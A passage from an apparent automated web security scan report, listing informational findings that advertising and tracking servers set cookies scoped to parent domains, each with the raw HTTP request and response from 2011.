The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=770680268%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBswcDAqG%2FlKsrBoM7AIKDUwNAAFO8FU6LbwBTPZTAl%2BBVM8TJDBG9ClOyHCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnANTAschKqvBlNAziGFuEOdGQASLIfoOQXglEJe9h7j6H0S7PoRnCtF3AOJcfyAPALT0PEg%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2OL%2F95hLDAyM%2BlauohwgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O2VIOrL7cNAipmBgecnA98vBh5lAQcmoNL%2F38FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoKVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAAD7RrWB

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:38:23 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBsz8DAqG%2FlqneZQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAKdJPTM%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:23 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsg2P7%2F95jTDAyM%2BlauepdBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydsrQdSX24eBFDMDA%2B9PBr5fDDzKAg5MQKX%2Fv4OVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQUrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQDJArZm; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:38:23 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.46. http://bcp.crwdcntrl.net/4/c=492%7Crand=775566438%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=775566438%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=775566438%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRDhxsDAqG8VcbmTQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeADd3Pa0%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsgwu3%2F9%2FAjDAyM%2BlYRlztBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtTQNSX2%2BuAFDMDg9BPBr5fDDzKAg5MQKX%2FH4GVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQBLgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBYVrRj

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 13:16:09 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRAjycDAqG%2BVfkSDQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeAKFrPSM%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:09 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgRvL%2F9%2BCPDAyM%2BlbpRzRAYgwczrJKLAwMZxkY%2FgPF3wApRgYGydvNIOrL7blAipmBQeQnA98vBh5lAQcmoNL%2FF8FKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1ioHi7EKLRpB7JGRrAqF7gqEJ%2BBS6ZOHb%2BTA3j34VcQuIgZvwKu1kkEFNQ34FfA%2BXg5fgXcCbsIKdiJXwFfxVv8CmTNLuJXAACxmbIG; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 13:16:09 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.47. http://bcp.crwdcntrl.net/4/c=492%7Crand=827998426%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=827998426%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=827998426%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRC8lIGBUd%2FKba8NgzoDg4BSA0MDULwXTIluA1M8l8GU4FcwxcsMEbwJUbIfIigN4S2EUIsgSvggvCwGEOB6DOGlQ6hECJUApvj%2Fgik2XjDFYQSmhM3AFNcMsHY%2BUYgGYTAlcg5MCRyHqKwGU0LPIIa5QZwbAREshug7BOGVQFz2HuLqfxDt%2BhCeKUTfAYhz%2FYE8ABzsPZI%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgeOn%2F7zGpDAyM%2BlZue21AYgwczrJKLAwMZxkY%2FgPF3wApRgYGydvLQdSX2weBFDMDg8BPBr5fDDzKAg5MQKX%2Fv4KVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQYrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQCJaLYm

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:59:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRBhysDAqG8V0V%2FMoM7AIKDUwNAAFO8FUzyXwZToNjAl%2BBVM8TJD5G5C5PZDBKUhvIUQahFECR%2BEl8UAAlyPIbx0CJUIoRLAFP9fMMXGC6Y4jMCUsBmY4poB1s4nCtEgDKZEzkGUVIMpgeMQU9zAlNAziHMjILxiiL5DEF4JxGXvIdr1IY7%2FB6FMIfoOQJzrD%2BQBALfZPUI%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:59:33 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgwvT%2F9%2FCrDAyM%2BlYR%2FcUgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0pIOrL7XVAipmBQfAnA98vBh5lAQcmoNL%2Fj8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoAlyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAACgfrQI; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:59:33 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.48. http://bcp.crwdcntrl.net/4/c=492%7Crand=939941480%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=939941480%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=939941480%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRA8kYGBUd%2FKraCbQZ2BQUCpgaEBKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMwxTUDrJ1PFKJBGEyJnIMoqQZTAschpriBKaFnEOdGQHjFEH2HILwSiMveQ7TrQxz%2FD0KZQvQdgDjXH8gDAP0hPYA%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgeOL%2F7zGVDAyM%2BlZuBd0gMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0VIOrL7UNAipmBgf8nA98vBh5lAQcmoNL%2F38BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoCVyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAACnk7ZF

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:40:05 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRC8lIGBUd%2FKba8NgzoDg4BSA0MDULwXTIluA1M8l8GU4FcwxcsMEbwJUbIfIigN4S2EUIsgSvggvCwGEOB6DOGlQ6hECJUApvj%2Fgik2XjDFYQSmhM3AFNcMsHY%2BUYgGYTAlcg5MCRyHqKwGU0LPIIa5QZwbAREshug7BOGVQFz2HuLqfxDt%2BhCeKUTfAYhz%2FYE8ABzsPZI%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:40:05 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgeOn%2F7zGpDAyM%2BlZue21AYgwczrJKLAwMZxkY%2FgPF3wApRgYGydvLQdSX2weBFDMDg8BPBr5fDDzKAg5MQKX%2Fv4KVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQYrgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQCJaLYm; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:40:05 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.49. http://bcp.crwdcntrl.net/4/c=492%7Crand=996397162%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=492%7Crand=996397162%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=492%7Crand=996397162%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=256d63b06b8b5a8d4fa891a87d791a1a; aud=ABR4nGNgYGDwXRBhysDAqG8V0V%2FMoM7AIKDUwNAAFO8FUzyXwZToNjAl%2BBVM8TJD5G5C5PZDBKUhvIUQahFECR%2BEl8UAAlyPIbx0CJUIoRLAFP9fMMXGC6Y4jMCUsBmY4poB1s4nCtEgDKZEzkGUVIMpgeMQU9zAlNAziHMjILxiiL5DEF4JxGXvIdr1IY7%2FB6FMIfoOQJzrD%2BQBALfZPUI%3D; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgwvT%2F9%2FCrDAyM%2BlYR%2FcUgMQYOZ1klFgaGswwM%2F4Hib4AUIwOD5O0pIOrL7XVAipmBQfAnA98vBh5lAQcmoNL%2Fj8BKgRQjA1AVo9BWS7gepp8MzL8YmIU2bUIWYvnFwKSUNBNuJEQVk1K8F1hoAlyIUWjTDmSNjGBVLnBVID4Dl0ydOn4nB%2FDuw68gcBEzfgVcrZMIKKhvwK%2BA8%2FFy%2FAq4E3YRUrATvwK%2Birf4FciaXcSvAACgfrQI

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:59:50 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwXRDhxsDAqG8VcbmTQZ2BQUCpgaEBKN4LpkS3gSmey2BK8CuY4mWGCN6EKNkPEZSG8BZCqEUQJXwQXhYDCHA9hvDSIVQihEoAU%2Fx%2FwRQbL5jiMAJTwmZgimsGWDufKESDMJgSOQemBI5DVFaDKaFnEMPcIM6NgAgWQ%2FQdgvBKIC57D3H1P4h2fQjPFKLvAMS5%2FkAeADd3Pa0%3D; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:59:50 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4Lsgwu3%2F9%2FAjDAyM%2BlYRlztBYgwczrJKLAwMZxkY%2FgPF3wApRgYGydtTQNSX2%2BuAFDMDg9BPBr5fDDzKAg5MQKX%2FH4GVAilGBqAqRqGtlnA9TD8ZmH8xMAtt2oQsxPKLgUkpaSbcSIgqJqV4L7DQBLgQo9CmHcgaGcGqXOCqQHwGLpk6dfxODuDdh19B4CJm%2FAq4WicRUFDfgF8B5%2BPl%2BBVwJ%2BwipGAnfgV8FW%2FxK5A1u4hfAQBYVrRj; Domain=.crwdcntrl.net; Expires=Wed, 04-Jan-2012 12:59:50 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.50. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535461&ev=4608069584519221037 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Cache-Control: no-cache, no-store
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:41:20 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535461.4608069584519221037.0|531292.CG-00000001131071922.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.1; Domain=.contextweb.com; Expires=Tue, 10-Apr-2012 16:41:20 GMT
Content-Type: image/gif
Date: Mon, 11 Apr 2011 16:41:19 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
5.51. http://bh.contextweb.com/bh/sync/admeld  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:19 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 162
Date: Mon, 11 Apr 2011 16:31:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=wOEFmQuIafIS&_segment=2%7CwOEFmQuIafIS%7C"/>');
5.52. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326412&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/wn.loc.wcax/news;sz=728x90;wnsz=41;tile=3;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408230;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=26798968?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=73786992-c1ac-4ae0-ab08-95828826c2953Hu01g; A3=iVGCazDb02Hn00002h6GXaxsD0czK00000idb7axqo02Hn00000iryraz5F09Fl0000aidb8axqo02Hn00000h6H6axsD0czK00000izcpayfZ0bnA00001iGeHaztg0bBg00001hZiFayN607xf00000hRzPazYC07tg00001iVEMazDb02Hn00001iVF7aztg02Hn00001iKJmayXi07Nz00001ieWcaxuC035P00000hGtnaxCA0bKd00001gy4faxT809wy0000ki9lAaxCA0bKd00003hRzOazYy07tg00001iznKax6T0bI400001iRc1az5S0cba00001hUeBaxLG0cdw00001iBoWax1n06UE00001iGxeaxBP07pd00001i9lUaxwP0bKd00001htT2ax2d07aw00001iwN7az7I0czK0000chVoJawTt0bKd00004hUeyaxqd0cdw00001imVBayg20cEt00001b2Xeayce04m400000hGteaxw50bKd00001hVo4axCA0bKd00003hGtDaxxL0bKd00005iBlzaxwY06UE00001iwZ+azjI0czK00005gx4UayXj09wy00002gy4daxKP09wy00002ipIYayg10cEt00001iB.Uaxqo02Hn00005iznWax7U0bI400001; B3=97pN0000000001t.8Tjz0000000000tX8KY10000000000t.8dnC0000000002u28P920000000001tV8HLo0000000005tY8Qvs0000000003tY95u+0000000001tU6Yf50000000001tU8Jbw0000000004tV93Np0000000001tW8Swk0000000005tX8nf80000000000tX8B100000000001tY9ajg0000000001u08nf90000000000tX8ZIR0000000002tV8V.x0000000001tZ92de0000000002tW8Jbt0000000003tY8QDY0000000001u193Nl0000000001tX8SBq0000000001tZ8B0.0000000001tX8TZe000000000au09br40000000001u19br30000000001u15J3v0000000000tZ8Qvv0000000001tX8B120000000005tX9br20000000002u184hv0000000002t.8Ykb0000000001tZ8WhH0000000001tV9c2I000000000hu086Y60000000001tW8Swi0000000000tX95uB0000000001tX8Swj0000000000tX851k000000000mtY

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=idb7axqo02Hn00000h6GXaxsD0czK00000iVGCazDb02Hn00002iryraz5F09Fl0000aiGeHaztg0bBg00001izcpayfZ0bnA00001h6H6axsD0czK00000idb8axqo02Hn00000hZiFayN607xf00000hGtnaxCA0bKd00001ieWcaxuC035P00000iKJmayXi07Nz00001iVF7aztg02Hn00001iVEMazDb02Hn00001hRzPazYC07tg00001hRzOazYy07tg00001i9lAaxCA0bKd00003gy4faxT809wy0000kiznKax6T0bI400001iBoWax1n06UE00001hUeBaxLG0cdw00001iRc1az5S0cba00001htT2ax2d07aw00001i9lUaxwP0bKd00001iGxeaxBP07pd00001iuodaAyr09Fl00001imVBayg20cEt00001hUeyaxqd0cdw00001iwN7az7I0czK0000ciwZ+azjI0czK00005iBlzaxwY06UE00001hGtDaxxL0bKd00005hVo4axCA0bKd00003hGteaxw50bKd00001b2Xeayce04m400000gy4daxKP09wy00002gx4UayXj09wy00002ipIYayg10cEt00001iB.Uaxqo02Hn00005iznWax7U0bI400001; expires=Fri, 08-Jul-2011 08:59:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8dnC0000000002u28KY10000000000t.8Tjz0000000000tX97pN0000000001t.8P920000000001tV8Qvs0000000003tY8HLo0000000005tY95u+0000000001tU8Swk0000000005tX93Np0000000001tW8Jbw0000000004tV8T+c0000000001u48B100000000001tY8nf80000000000tX8V.x0000000001tZ8ZIR0000000002tV8nf90000000000tX9ajg0000000001u08QDY0000000001u18Jbt0000000003tY92de0000000002tW8SBq0000000001tZ93Nl0000000001tX8B0.0000000001tX8TZe000000000au09br40000000001u18B120000000005tX8Qvv0000000001tX5J3v0000000000tZ9br30000000001u18WhH0000000001tV8Ykb0000000001tZ84hv0000000002t.9br20000000002u186Y60000000001tW9c2I000000000hu08Swi0000000000tX851k000000000mtY8Swj0000000000tX95uB0000000001tX; expires=Fri, 08-Jul-2011 08:59:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 09 Apr 2011 12:59:30 GMT
Connection: close
Content-Length: 1841

